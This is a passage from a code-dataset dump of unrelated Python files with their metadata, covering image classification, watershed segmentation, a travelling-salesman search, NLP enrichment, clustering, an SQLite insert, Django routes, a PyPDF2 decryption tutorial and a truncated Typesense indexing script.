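# O(bins * pairs). np.histogram builds the 50-bin table over [0, 2) in one pass (note the
# original's `while x <= fi` bound can also emit an extra bin starting near x = 2.0,
# depending on float accumulation). A sketch with hypothetical stand-in values:
import numpy as np

values = np.random.uniform(0, 2, size=1000)
counts, edges = np.histogram(values, bins=50, range=(0, 2))
for left_edge, count in zip(edges[:-1], counts):
    print(left_edge, count, sep='\t')   # same tab-separated table the script prints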
"matplotlib.pyplot.rc", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 357, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 357, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 363, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 389, "usage_type": "name"}]} {"seq_id": "19398679", "text": "# predict.py\n#\n# Command line tool to predict the class of an image using a pretrained\n# pytorch network\n#\n# Author: Taylor Weiss\n# Class: Udacity - AI Programming with Python Nanodegree Program\n# Project: Image Classifier\n\n\nimport argparse\nimport data\nimport network\nimport json\nimport os.path\n\n\n# Define command line arguments\nparser = argparse.ArgumentParser(\n description='use a checkpoint to predict the name of an image'\n)\n\nparser.add_argument(\n 'input',\n action='store',\n help='path to the image file'\n)\nparser.add_argument(\n 'checkpoint',\n action='store',\n help='path to the checkpoint file'\n)\nparser.add_argument(\n '--top_k',\n action='store',\n help='number of likely classes to return',\n type=int,\n default=5\n)\nparser.add_argument(\n '--category_names',\n action='store',\n help='path to a json mapping of category labels to names'\n)\nparser.add_argument(\n '--gpu',\n action='store_true',\n help='use the gpu for prediction',\n default=False\n)\n\nargs = parser.parse_args()\n\n# validate and convert the image file\nimage_filename = args.input\nif not os.path.isfile(image_filename):\n print('Unable to find image file', image_filename)\n exit()\n\n# BUGBUG: useful for testing, but probably don't want to assume the\n# image is from the image dataset\nimage_category = image_filename.split(os.sep)[-2]\n\nimage_data = data.process_image(args.input)\n\n# create the network\ndevice = 'cuda' if args.gpu else 'cpu'\nmodel = network.load_network(args.checkpoint, device)\n\n# predict\nprobs, classes = network.predict(image_data, model, device, topk=args.top_k)\n\n# Load the category to name mapping if provided\ncat_to_name = None\nif args.category_names and os.path.isfile(args.category_names):\n with open(args.category_names, 'r') as f:\n cat_to_name = json.load(f)\n\n# output results\nprint('Image category:', image_category)\nif cat_to_name:\n print('Image name:', cat_to_name[image_category])\nprint('Probabilities:', probs)\nprint('Classes:', classes)\nif cat_to_name:\n names = 
[cat_to_name[cat] for cat in classes]\n print('Names:', names)\n", "sub_path": "predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 2097, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.sep", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 62, "usage_type": "name"}, {"api_name": "data.process_image", "line_number": 64, "usage_type": "call"}, {"api_name": "network.load_network", "line_number": 68, "usage_type": "call"}, {"api_name": "network.predict", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 75, "usage_type": "name"}, {"api_name": "json.load", "line_number": 77, "usage_type": "call"}]} {"seq_id": "514414843", "text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('coins.jpg')\nimg = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nret, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n\n# sure background area\nsure_bg = cv2.dilate(opening,kernel,iterations=3)\n\n# Finding sure foreground area\ndist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\nret, sure_fg = cv2.threshold(dist_transform,0.2*dist_transform.max(),255,0)\n\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv2.subtract(sure_bg,sure_fg)\n\n# Marker labelling\nret, markers = cv2.connectedComponents(sure_fg)\n\n# Add one to all labels so that sure background is not 0, but 1\nmarkers = markers+1\n\n# Now, mark the region of unknown with zero\nmarkers[unknown==255] = 0\n\n# Apply watershed\nmarkers = cv2.watershed(img,markers)\nresult = np.copy(img)\nresult[markers == -1] = [255,0,0]\n\nplt.subplot(2,3,1),plt.imshow(img)\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,2),plt.imshow(gray)\nplt.title('Greyscale'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,3),plt.imshow(dist_transform)\nplt.title('Distance Transform'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,4),plt.imshow(unknown)\nplt.title('Sure fg/bg regions marked purple'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,5),plt.imshow(markers)\nplt.title('Marker Image after Segmentation'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,6),plt.imshow(result)\nplt.title('Result'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n", "sub_path": "watershed_segmentation.py", "file_name": "watershed_segmentation.py", "file_ext": "py", "file_size_in_byte": 1685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 7, "usage_type": "call"}, {"api_name": 
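# A follow-up the watershed script above makes easy: after cv2.watershed(), the marker
# image labels each coin with its own integer (1 is the sure background, -1 marks the
# watershed boundaries), so the coins can be counted directly from the script's
# `markers` array if this runs right after the watershed call:
import numpy as np

labels = np.unique(markers)                  # e.g. array([-1, 1, 2, 3, ...])
print('coins found:', np.sum(labels > 1))    # skip boundary (-1) and background (1)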
"cv2.COLOR_BGR2GRAY", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.distanceTransform", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.DIST_L2", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.subtract", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.connectedComponents", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.watershed", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 46, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.subplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} {"seq_id": "131886312", "text": "import numpy as np\nimport pandas as pd\n#from matplotlib import pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport itertools as it\nimport random\n\nnames = ['State', 'City', 'Latitude', 'Longitude']\nData = pd.read_table('posit.txt', names=names)\n\ncity_to_index = {}\nfor i in xrange(50):\n city_to_index[Data['City'][i]] = i\n\nindex_to_city = {}\nfor key in city_to_index:\n index_to_city[city_to_index[key]] = key\n\ndef distance(city1, city2):\n lat1 = Data['Latitude'][city_to_index[city1]]*np.pi/180.\n lat2 = Data['Latitude'][city_to_index[city2]]*np.pi/180.\n lon1 = Data['Longitude'][city_to_index[city1]]*np.pi/180.\n lon2 = Data['Longitude'][city_to_index[city2]]*np.pi/180.\n dlon = np.abs(lon2 - lon1)\n dlat = np.abs(lat2 - lat1)\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(min(1,np.sqrt(a)))\n return c * 6373 # km this value includes some elipticity of the earth\n # and is optimizes for ~39 lat Haversine Formula\n\ndef trip_length(list_of_cities):\n length = 0\n for i in range(len(list_of_cities)-1):\n city1 = list_of_cities[i]\n city2 = list_of_cities[i+1]\n length += distance(city1, city2)\n return length\n\ndef brute_force(start_city, other_cities):\n trips = []\n for perm in list(it.permutations(other_cities)):\n trips.append([start_city]+[x for x in perm]+[start_city])\n for trip in trips:\n trips.remove(trip[::-1])\n distances = np.zeros(len(trips))\n for i in xrange(len(distances)):\n distances[i] = trip_length(trips[i])\n index = np.argsort(distances)\n ordered_distance = distances[index]\n ordered_trips = []\n for value in index:\n ordered_trips.append(trips[value])\n return ordered_distance, ordered_trips\n\ncapitals = list(Data['City'].drop([city_to_index['Juneau'],\n city_to_index['Honolulu']]).values)\nrandom_11 = []\nfor i in range(11):\n random_11.append(random.choice(capitals))\n capitals.remove(random_11[-1])\n\nordered_distance, ordered_trips = brute_force(random_11[0],\n random_11[1:])\n# why do you have to assign this\n\nnp.savez('11_city_brute_force.npz', ordered_distance=ordered_distance,\n ordered_trips=ordered_trips)\n", "sub_path": "traveling_sales.py", "file_name": 
"traveling_sales.py", "file_ext": "py", "file_size_in_byte": 2365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pandas.read_table", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.arcsin", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 29, "usage_type": "call"}, {"api_name": "itertools.permutations", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 50, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 68, "usage_type": "call"}]} {"seq_id": "597123587", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\n\nThe following script performs the necessary NLP enrichment on the documents.\n\nExamples\n--------\n\n.. code-block:: bash\n\n python document_enrichment --cores 2 --fields title abstract --inputs \\\nsample_dataset/patent.sample* --output .\n\n\"\"\"\n\nimport os\nimport argparse\nimport multiprocessing as mp\n\nfrom spacy_enrichment.spacy_enrichment import enrich_documents\n\n\ndef run_enricher(args):\n \"\"\"\n\n Perform enrichment on multiple document files in parallel.\n\n Parameters\n ----------\n args : dict\n Arguments.\n\n \"\"\"\n\n if args.cores == 1:\n for ipath in args.inputs:\n enrich_documents(ipath, args)\n else:\n pool = mp.Pool(args.cores)\n for ipath in args.inputs:\n res = pool.apply_async(enrich_documents, args=(ipath, args, ))\n pool.close()\n pool.join()\n if not res.successful():\n print(res.get())\n\n\ndef files_path_validation(paths):\n \"\"\" Validation of a list of file paths.\n\n Parameters\n ----------\n paths : list\n A list of paths to files.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n\n \"\"\"\n\n for path in paths:\n if not os.path.exists(path):\n raise FileNotFoundError('File {0} is not there.'.format(path))\n\n\ndef dir_path_validation(path, create_dir=False):\n \"\"\"Directory path validation.\n\n Parameters\n ----------\n path : str\n /path/to/a/directory/.\n create_dir : bool\n If True, a new directory will be made once it doesn't exist.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n NotADirectoryError\n Raised if ``path`` is not a directory.\n\n \"\"\"\n\n if not os.path.exists(path):\n if create_dir:\n os.makedirs(path)\n else:\n raise FileNotFoundError('Directory {0} is not there.'.format(path))\n elif not os.path.isdir(path):\n raise NotADirectoryError('{0} is not a directory.'.format(path))\n\n\nif __name__ == \"__main__\":\n pparser = argparse.ArgumentParser()\n pparser.add_argument('--fields', nargs='+', type=str,\n help='Content fields to enrich.')\n pparser.add_argument('--cores', type=int, default=2,\n help='How many cores to use?')\n pparser.add_argument('--noun-chunk', action='store_true',\n help='generate noun 
chunks')\n pparser.add_argument('--sents', action='store_true',\n help='split to sentences')\n pparser.add_argument('--svo', action='store_true',\n help='generate svo')\n pparser.add_argument('--entity', action='store_true',\n help='generate entities')\n pparser.add_argument('--inputs', nargs='+', required=True,\n help='Path to input documents')\n pparser.add_argument('--output', required=True, help='Path to output dir.')\n pparser.add_argument('--chunk-size', type=int, default=128,\n help='# of documents to handle at once')\n args = pparser.parse_args()\n files_path_validation(args.inputs)\n dir_path_validation(args.output, create_dir=True)\n run_enricher(args)\n", "sub_path": "document_enrichment.py", "file_name": "document_enrichment.py", "file_ext": "py", "file_size_in_byte": 3234, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "spacy_enrichment.spacy_enrichment.enrich_documents", "line_number": 38, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 40, "usage_type": "call"}, {"api_name": "spacy_enrichment.spacy_enrichment.enrich_documents", "line_number": 42, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 98, "usage_type": "call"}]} {"seq_id": "207341497", "text": "from tools.load import LoadMatrix\nfrom sg import sg\nlm=LoadMatrix()\n\ntraindat=lm.load_numbers('../data/fm_train_real.dat')\nparameter_list=[[traindat,10,3],[traindat,11,4]]\ndef clustering_hierarchical (fm_train=traindat, size_cache=10,merges=3):\n\n\tsg('set_features', 'TRAIN', fm_train)\n\tsg('set_distance', 'EUCLIDIAN', 'REAL')\n\tsg('new_clustering', 'HIERARCHICAL')\n\tsg('train_clustering', merges)\n\n\t[merge_distance, pairs]=sg('get_clustering')\n\treturn [merge_distance, pairs]\n\nif __name__=='__main__':\n\tprint('Hierarchical')\n\tclustering_hierarchical(*parameter_list[0])\n", "sub_path": "build/shogun_lib/examples/undocumented/python_static/clustering_hierarchical.py", "file_name": "clustering_hierarchical.py", "file_ext": "py", "file_size_in_byte": 569, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tools.load.LoadMatrix", "line_number": 3, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 9, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 10, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 11, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 12, "usage_type": "call"}, {"api_name": "sg.sg", "line_number": 14, "usage_type": "call"}]} {"seq_id": "395665862", "text": "import sqlite3\r\nfrom sqlite3 import Error\r\n\r\ndef create_connection(db_file):\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n return None\r\n\r\ndef create_task(conn, task):\r\n sql = ''' INSERT INTO tutorial_ticket(id,plugin_id,date,hostname,ip_address,plugin_name)\r\n VALUES(?,?,?,?,?,?) 
'''\r\n cur = conn.cursor()\r\n cur.execute(sql, task)\r\n return cur.lastrowid\r\n\r\ndef main():\r\n database = \"db.sqlite3\"\r\n conn = create_connection(database)\r\n with conn:\r\n task = ('6','97000','2019-01-07 13:02:15','sbibpl_gns.ad.trw.com','192.168.1.1','NFS Vulnerability')\r\n create_task(conn, task)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "update_db.py", "file_name": "update_db.py", "file_ext": "py", "file_size_in_byte": 771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}, {"api_name": "sqlite3.version", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 9, "usage_type": "name"}]} {"seq_id": "133852254", "text": "from django.urls import path\n\nfrom .views import (\n DetailPlantings,\n client_index,\n coopdetailPlantings,\n plants_par_section,\n projet,\n detail_proj,\n localisation,\n detail_coop,\n # chart,\n prod_coop,\n parcelle_coop,\n localisation_coop,\n section_coop,\n sous_section_coop,\n planting_coop, formations,\n detail_formation,\n export_prod_xls,\n export_parcelle_xls,\n export_prods_to_pdf,\n export_parcelles_to_pdf,\n Plantings,\n # export_plant_xls,\n # export_formation_xls,\n # export_prods_to_pdf,\n # export_parcelles_to_pdf,\n # producteursPDF\n)\n\napp_name='clients'\n\n\nurlpatterns = [\n # path('', connexion, name='connexion'),\n # path('logout', loggout, name='logout'),\n path('index/', client_index, name='dashboard'),\n path('projets/', projet, name='projets'),\n path('formation/', formations, name='formations'),\n path('formation//', detail_formation, name='formation'),\n path('producteurs/', prod_coop, name='prod_coop'),\n path('parcelles/', parcelle_coop, name='parcelle_coop'),\n path('sections/', section_coop, name='section_coop'),\n path('sous_sections/', sous_section_coop, name='sous_section_coop'),\n path('planting/', planting_coop, name='planting_coop'),\n path('coordonnes/', localisation_coop, name='localisation_coop'),\n path('localisation/', localisation, name='localisation'),\n path('Plantings/', Plantings, name='Plantings'),\n path('DetailPlantings/', DetailPlantings, name='DetailPlantings'),\n path('coopdetailPlantings/', coopdetailPlantings, name='coopdetailPlantings'),\n path('plants_par_section/', plants_par_section, name='plants_par_section'),\n \n # path('site_pepinieres/', site_pepinieres, name='site_pepinieres'),\n # path('coop_pepiniere/', coop_pepiniere, name='coop_pepiniere'),\n path('detail_proj/', detail_proj, name='detail_proj'),\n path('detail_coop/', detail_coop, name='detail_coop'),\n # #Charts\n # path('Stats_coop/', Stats_coop, name='stats_coop'),\n # path('Stats_semences/', Stats_semences, name='stats_semences'),\n # path('Production_plan/', Production_plan, name='production_plan'),\n # path('plants_coop/', plants_coop, name='plants_coop'),\n # path('semences_coop/', semences_coop, name='semences_coop'),\n # path('chart/', chart, name='chart'),\n #\n # #Export to Excel\n path('cooperative//producteurs/xls/', export_prod_xls, name='export_prod_xls'),\n # # path('sections/xls/', export_section_xls, name='export_section_xls'),\n # # path('sous_sections/xls/', export_sous_section_xls, name='export_sous_section_xls'),\n path('cooperative//parcelles/xls/', export_parcelle_xls, name='export_parcelle_xls'),\n # path('cooperative//plants/xls/', export_plant_xls, name='export_plant_xls'),\n # path('cooperative//formations/xls/', 
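# Read-back check for update_db.py above: the `with conn:` block commits the INSERT on
# exit, so the new ticket row is immediately visible to other connections. A small
# verification sketch against the same db.sqlite3 / tutorial_ticket schema:
import sqlite3

conn = sqlite3.connect('db.sqlite3')
row = conn.execute('SELECT id, hostname, plugin_name FROM tutorial_ticket WHERE hostname = ?',
                   ('sbibpl_gns.ad.trw.com',)).fetchone()
print(row)   # the tuple inserted above (id may come back as an int due to column affinity)
conn.close()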
export_formation_xls, name='export_formation_xls'),\n #\n # # Export Données EN PDF\n path('producteurs/pdf/', export_prods_to_pdf, name='export_prods_to_pdf'),\n # path('producteurs/pdf/', producteursPDF, name='prods_to_pdf'),\n path('parcelles/pdf/', export_parcelles_to_pdf, name='export_parcelles_to_pdf'),\n]\n", "sub_path": "clients/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3353, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "views.client_index", "line_number": 38, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "views.projet", "line_number": 39, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "views.formations", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "views.detail_formation", "line_number": 41, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "views.prod_coop", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "views.parcelle_coop", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "views.section_coop", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "views.sous_section_coop", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "views.planting_coop", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "views.localisation_coop", "line_number": 47, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 48, "usage_type": "call"}, {"api_name": "views.localisation", "line_number": 48, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "views.Plantings", "line_number": 49, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "views.DetailPlantings", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "views.coopdetailPlantings", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "views.plants_par_section", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "views.detail_proj", "line_number": 56, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "views.detail_coop", "line_number": 57, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 67, "usage_type": "call"}, {"api_name": "views.export_prod_xls", "line_number": 67, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 70, "usage_type": "call"}, {"api_name": "views.export_parcelle_xls", "line_number": 70, "usage_type": "argument"}, {"api_name": "django.urls.path", 
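# The XLS export routes above imply views that stream a spreadsheet back; those view
# bodies are not part of this file, so the following is only a plausible sketch of
# export_prod_xls using xlwt (the Producteur model and its fields are hypothetical):
import xlwt
from django.http import HttpResponse

def export_prod_xls(request, id):
    response = HttpResponse(content_type='application/ms-excel')
    response['Content-Disposition'] = 'attachment; filename="producteurs.xls"'
    book = xlwt.Workbook(encoding='utf-8')
    sheet = book.add_sheet('Producteurs')
    for row, prod in enumerate(Producteur.objects.filter(cooperative_id=id)):  # hypothetical model
        sheet.write(row, 0, str(prod))   # one cell per producteur, for illustration
    book.save(response)
    return response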
"line_number": 75, "usage_type": "call"}, {"api_name": "views.export_prods_to_pdf", "line_number": 75, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 77, "usage_type": "call"}, {"api_name": "views.export_parcelles_to_pdf", "line_number": 77, "usage_type": "argument"}]} {"seq_id": "620358544", "text": "import PyPDF2\n\npdfReader = PyPDF2.PdfFileReader(open('encrypted.pdf', 'rb'))\n\nprint('pdfReader.isEncrypted: %s' %(pdfReader.isEncrypted))\n\n# The following line will fail fail because the 'encrypted.pdf' file is\n# encrypted with a password of 'rosebud' (The Sims money cheat reference)\n\n# print('Attempting to get the first page from the encrypted PDF: pdfReader.getPage(0): %s' %(pdfReader.getPage(0)))\n\npdfReader.decrypt('rosebud')\n\npageObj = pdfReader.getPage(0)\n\nprint('pageObj: %s' %(pageObj))\n\n\n", "sub_path": "python/03AutomateTheBoringStuffWithPython/13WorkingWithPDFAndWordDocuments/02DecryptingPDFs.py", "file_name": "02DecryptingPDFs.py", "file_ext": "py", "file_size_in_byte": 500, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyPDF2.PdfFileReader", "line_number": 3, "usage_type": "call"}]} {"seq_id": "142386976", "text": "import sys\nimport typesense\nimport unicodedata\n\nfileName = sys.argv[1]\n\nclient = typesense.Client({\n 'nodes': [{\n 'host': 'localhost', # For Typesense Cloud use xxx.a1.typesense.net\n 'port': '8108', # For 